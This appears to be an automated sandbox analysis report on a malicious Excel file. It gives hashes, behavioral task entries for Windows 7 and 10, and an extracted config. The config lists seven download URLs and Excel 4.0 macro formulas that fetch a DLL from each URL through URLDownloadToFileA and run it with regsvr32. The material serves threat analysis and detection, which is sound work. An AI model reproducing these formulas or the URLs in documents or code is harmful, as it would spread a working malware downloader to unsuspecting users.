General
-
Target
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
Size
29KB
-
Sample
240909-1zrtqsseqr
-
MD5
cd0dcdbdfc1cf4b526986ec894b047d5
-
SHA1
eeb5a806d9b67394a5bf71f61f6b25968fca24ae
-
SHA256
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
SHA512
9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024
-
SSDEEP
384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja
Static task
static1
Behavioral task
behavioral1
Sample
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a.xlsx
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://www.casache.com/web/gTj3TrZ/
https://www.aulavirtualapecc.com/server/oib/
http://30aweddingco.com/cgi-bin/QUx/
http://blacksmithbooks.com/blog/OkmsfYUA/
http://consultores-sic.com/fw/AOOfOtj1qqgLWR/
http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/
https://damjangro.org/data/XPMJ/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Targets
-
-
Target
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
Size
29KB
-
MD5
cd0dcdbdfc1cf4b526986ec894b047d5
-
SHA1
eeb5a806d9b67394a5bf71f61f6b25968fca24ae
-
SHA256
6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a
-
SHA512
9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024
-
SSDEEP
384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja
Score3/10 -